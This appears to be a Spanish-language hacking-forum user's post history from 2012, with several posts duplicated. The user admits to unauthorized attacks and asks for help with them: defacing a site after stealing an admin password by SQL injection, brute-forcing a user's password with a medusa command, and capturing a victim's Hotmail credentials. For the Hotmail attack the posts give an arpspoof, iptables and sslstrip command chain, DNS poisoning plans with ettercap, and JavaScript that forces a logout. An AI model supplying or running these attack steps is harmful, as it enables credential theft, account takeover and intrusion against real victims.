realize una inyeccion SQL a una pagina web, y logre obtener el nombre de administrador y contraseña de la pagina web... ahora bien, como puedo hacer un deface??... ingresar y cambiar el contenido de la pagina ( no hay ninguna sección para ingresar un login o un password) :S alguien de ustedes sabe como hacerlo?? ... Gracias!...
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#22
Hacking / ¿como hackear una pagina web?
14 Mayo 2012, 05:48 AM
Estoy intentando hackear un usuario de una web mediante un ataque de diccionario con la aplicacion medusa de backtrack 5... hice un escaneo de puertos a la pagina con nmap y pude observar abierto el http, ssh, https, doom y nrpe ... despues procedi a efectuar el ataque:
#medusa -h ipdelapagina -u usuariodelacuenta -P diccionario.txt -M ssh -L -f
total que probe con todos los servicios... y lo unico que recibia como contraseña era la primera palabra del archivo "diccionario.txt" (obbiamente esa no es la contraseña del usuario)
¿que estoy haciendo mal? ... puede ser que la ip no es la correcta?? por que para sacar la ip del sitio yo hago un ping a la pagina, pero despues la pagina tiene un menu en el que viene la opcion "entrar" ( y aparece el espacio para que pongas usuario y contraseña), al dar clic en "entrar" la direccion de la pagina cambia a:
nombredelapagina.com.mx/user/login ( no se si al hacer esto la direccion ip cambia, puesto que intente hacer un ping a la direccion con "/user/login" y no me daba ningun resultado" ...
¿ como puedo hacer este ataque de diccionario a la contraseña de un usuario de una pagina? .... ¿conocen algun otro modo de hackear al usuario?...
#medusa -h ipdelapagina -u usuariodelacuenta -P diccionario.txt -M ssh -L -f
total que probe con todos los servicios... y lo unico que recibia como contraseña era la primera palabra del archivo "diccionario.txt" (obbiamente esa no es la contraseña del usuario)
¿que estoy haciendo mal? ... puede ser que la ip no es la correcta?? por que para sacar la ip del sitio yo hago un ping a la pagina, pero despues la pagina tiene un menu en el que viene la opcion "entrar" ( y aparece el espacio para que pongas usuario y contraseña), al dar clic en "entrar" la direccion de la pagina cambia a:
nombredelapagina.com.mx/user/login ( no se si al hacer esto la direccion ip cambia, puesto que intente hacer un ping a la direccion con "/user/login" y no me daba ningun resultado" ...
¿ como puedo hacer este ataque de diccionario a la contraseña de un usuario de una pagina? .... ¿conocen algun otro modo de hackear al usuario?...
#23
Seguridad / ¿como usar diccionarios de john the ripper con medusa?
11 Mayo 2012, 14:45 PM
Hola a todos, pues estoy intentando realizar un ataque de diccionario a una Pagina con medusa (utilizando el servicio http) ... El problema es que a la hora de hacer el ataque (quiero obtener la contraseña de un usuario de bitefight) los diccionario que descargue, solo me muestran como resultado la primera palabra que esta escrita en ellos ( obiamente no es la contraseña correcta) ahora bien quisiera saber como usar los exelentes diccionarios de john the ripper con medusa y usar de manera optativa el ataque por fuerza bruta. Todo esto lo hago en backtrack 5 muchas gracias
#25
Hacking / ¿Como fusionar medusa con john the ripper?
9 Mayo 2012, 16:18 PM
Hola a todos, pues estoy intentando realizar un ataque de diccionario a una Pagina con medusa (utilizando el servicio http) ... El problema es que a la hora de hacer el ataque (quiero obtener la contraseña de un usuario de bitefight) los diccionario que descargue, solo me muestran como resultado la primera palabra que esta escrita en ellos ( obiamente no es la contraseña correcta) ahora bien quisiera saber como usar los exelentes diccionarios de john the ripper con medusa y usar de manera optativa el ataque por fuerza bruta. Todo esto lo hago en backtrack muchas gracias
#26
Scripting / Re: ¿como borrar cookies con codigo en java?
27 Enero 2012, 10:34 AM
Muchas gracias, es de gran ayuda la info, pero no será necesario
Que este alojado en hotmail puesto que realizare un envenenamiento
Dns con ettercap para rediréccionar a la víctima a la pág. Con
El código, ahora como hago para que desPues la página vuelva a
Rediréccionar a hotmail??? ... Además quiero informar que
Me esta fallando algo por que guardo este codigo en un servidor
Apache con la extensión HTML y no surte ningún efecto en las cookies
de la víctima... Que es lo q me esta fallando ??? Saludos
Que este alojado en hotmail puesto que realizare un envenenamiento
Dns con ettercap para rediréccionar a la víctima a la pág. Con
El código, ahora como hago para que desPues la página vuelva a
Rediréccionar a hotmail??? ... Además quiero informar que
Me esta fallando algo por que guardo este codigo en un servidor
Apache con la extensión HTML y no surte ningún efecto en las cookies
de la víctima... Que es lo q me esta fallando ??? Saludos
#28
Scripting / ¿como borrar cookies con codigo en java?
27 Enero 2012, 07:12 AM
Hola a todos, uso backtrack 5 y sslstrip para monitorizar las conexiones SSL de la siguiente manera:
Código:
Después miro el archivo.log de sslstrip y listo ahí aparecen los usuarios y contraseñas, pero con un problema. Aparecen, si no tiene iniciada la sesión en la página. Si ya ha iniciado la sesión me aparecen caracteres raros de "id" (secuencia de números).
¿Como puedo obligarle a cerrar la sesión para que tenga que logearse de nuevo?
he leido que se hace redireccionando a la victima a una pagina con un script...
asi que encontre un codigo para borrar las cookies (asi se le cerrara la sesion a la victima)... el codigo es el siguiente:
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">
//Código en javascript que me elimina las cookies
<body >
<script language="javascript" type="text/javascript">
if (document.cookie != "") {
if (confirm("Eliminar todas las Cookies?")) {
la_cookie = document.cookie.split("; ")
fecha_fin = new Date
fecha_fin.setDate(fecha_fin.getDate()-1)
for (i=0; i<la_cookie.length; i++) {
mi_cookie = la_cookie.split("=")[0]
document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
}
document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
}
}
</script>
</body>
pero no tengo ni idea con que extension guardarlo dentro de mi servidor apache... tampoco tengo idea si es un codigo en php, html o java :S ... y despues de redireccionar a la pagina con el codigo que borra las cookies, ¿como puedo volver a redireccionar a la victima a la pagina de hotmail? ... muchas gracias espero su orientacion...
Código:
Código (bash) [Seleccionar]
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
python sslstrip.py -l 8080Después miro el archivo.log de sslstrip y listo ahí aparecen los usuarios y contraseñas, pero con un problema. Aparecen, si no tiene iniciada la sesión en la página. Si ya ha iniciado la sesión me aparecen caracteres raros de "id" (secuencia de números).
¿Como puedo obligarle a cerrar la sesión para que tenga que logearse de nuevo?
he leido que se hace redireccionando a la victima a una pagina con un script...
asi que encontre un codigo para borrar las cookies (asi se le cerrara la sesion a la victima)... el codigo es el siguiente:
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">
//Código en javascript que me elimina las cookies
<body >
<script language="javascript" type="text/javascript">
if (document.cookie != "") {
if (confirm("Eliminar todas las Cookies?")) {
la_cookie = document.cookie.split("; ")
fecha_fin = new Date
fecha_fin.setDate(fecha_fin.getDate()-1)
for (i=0; i<la_cookie.length; i++) {
mi_cookie = la_cookie.split("=")[0]
document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
}
document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
}
}
</script>
</body>
pero no tengo ni idea con que extension guardarlo dentro de mi servidor apache... tampoco tengo idea si es un codigo en php, html o java :S ... y despues de redireccionar a la pagina con el codigo que borra las cookies, ¿como puedo volver a redireccionar a la victima a la pagina de hotmail? ... muchas gracias espero su orientacion...
#29
Hacking / Re: ¿como cerrar conexiones para usar sslstrip?
5 Enero 2012, 23:21 PM
olle no es suficiente con el redireccionamiento echo con ettercap?? ... o es que debo insertar otro codigo en la misma pagina para que se vuelva a redireccionar?? ... y tengo otra duda.. : ¿con que extensión debo guardar el archivo "index"?? (con html, jsp o asp???? ... gracias!
#30
Hacking / Re: ¿como redireccionar a una pagina falsa y que despues se muestre la original?
5 Enero 2012, 07:56 AM
JSP perdon.